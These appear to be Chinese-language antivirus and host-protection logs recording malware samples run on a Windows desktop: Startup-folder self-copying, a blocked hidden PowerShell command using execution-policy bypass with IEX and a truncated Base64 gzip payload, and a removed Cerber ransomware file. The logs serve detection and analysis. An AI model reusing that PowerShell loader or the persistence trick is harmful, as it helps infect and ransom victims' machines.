2017/2/15 20:42:12 创建文件 允许
进程: c:\users\zheng\desktop\01.exe
目标: C:\Users\zheng\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\01.exe
规则: [应用程序组]垃圾屏蔽 35 -> [文件组]所有执行文件 -> [文件]*; *.exe
2017/2/15 20:42:12 创建文件 允许
进程: c:\users\zheng\desktop\01.exe
目标: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\01.exe
规则: [应用程序组]垃圾屏蔽 35 -> [文件组]所有执行文件 -> [文件]*; *.exe
【1】2017-02-15 20:49:04,系统防御,执行防护,10.exe触犯执行防护规则, 结束进程
操作者:C:\Users\zheng\Desktop\10.exe
命令行:"C:\Users\zheng\Desktop\10.exe"
风险动作:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $($s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIANcwhlgCA51WbW/bNhD+7l9xcLVaQixCcTsgCJBirpJuAbLWqLzlg2EgtHSOtcikSlJ+QeL/PlKiLDlO0GUCDFvk8bnnnnuh38GIr1HMCwY+3IpUKWQw28Jn/TUuBEMB7+GSrhD+oCLZdjraMlYpZ/A7Kv8WZ3GWIlPQeeyAfpx1DBfwFdf+t9k/GCvwx9scv9Il6kVFtH1Y2tfG5C+JlzinRaZCgYneSWkmNYSjRIF7q5Hgmy15ZqHXWyu1bWfXUMzr0DqPUO6PqKBLt/o9iZRI2f3UCflySVnSP1yNZBZz9mzxkq9ZxmlSrnoWU/AYpQQrwJInRYaG4G+uB5VJOge3dgM+/oDuLGVJ1ys3q3Pl2SyVWn4t+YV2udW/l8SoFvH4AZUk4zi/sRbTs+Dsw/FBIhUVyvi1nstdm6KLlt0wjjFXGrBKh1tR2b1GV+AKhcRjxnvoVspfYh6OrKPuaUBOP+jPxwE5G3T7Jg7rvFMJKJVAujRsK3CiCy0q1zTLhl+Vn4qeqZWuTUeLnJRZVIO9wg/jQtf8lkS1qWv99525Lirsu4/OWKPvwKcSJgdnvuOSKwxRqHSexlTh3zRLE2oqL6RZNqPxw9TzXqBDhoVamLI1h4byZWW8VgIbSZqQ2ppNZluFk+nUMd+m9AJCBoF+nn55DHZWVmRJve1OFG4UQRbzxNT1+fkwCq+vPSP1Z2Pjdm91gfK1rKZDtMAsA1Ewpq1BC1FIXaRdOAEH2ercvDHT4id6TedkvxHzZV6oZvOOhTzfivR+ocANPRgEp7/Cn2ksuORzBSEXORelgASGxqOxlCBQO1hhQu7YHbM1aDUhZmSh20TXD/rNC7lBdq8W7bKpO7hdOEd18zapJidTuNGQRhvb/WTP8+1c61
用户操作:结束进程
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【1】2017-02-15 20:48:36,病毒防御,恶意行为监控,发现未知病毒BEHAV:Ransom/Cerber, 已清除
病毒名称:BEHAV:Ransom/Cerber
文件路径:C:\Users\zheng\Desktop\08.exe
用户操作:已清除
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【1】2017-02-15 20:48:25,病毒防御,病毒查杀,自定义扫描,发现7个风险项目
病毒库:2017/02/15 16:00
开始时间:2017/02/15 20:48
总计用时:00:00:07
扫描对象:28个
发现威胁:7个
已处理威胁:7个
发现系统修复项:0个
处理系统修复项:0个 |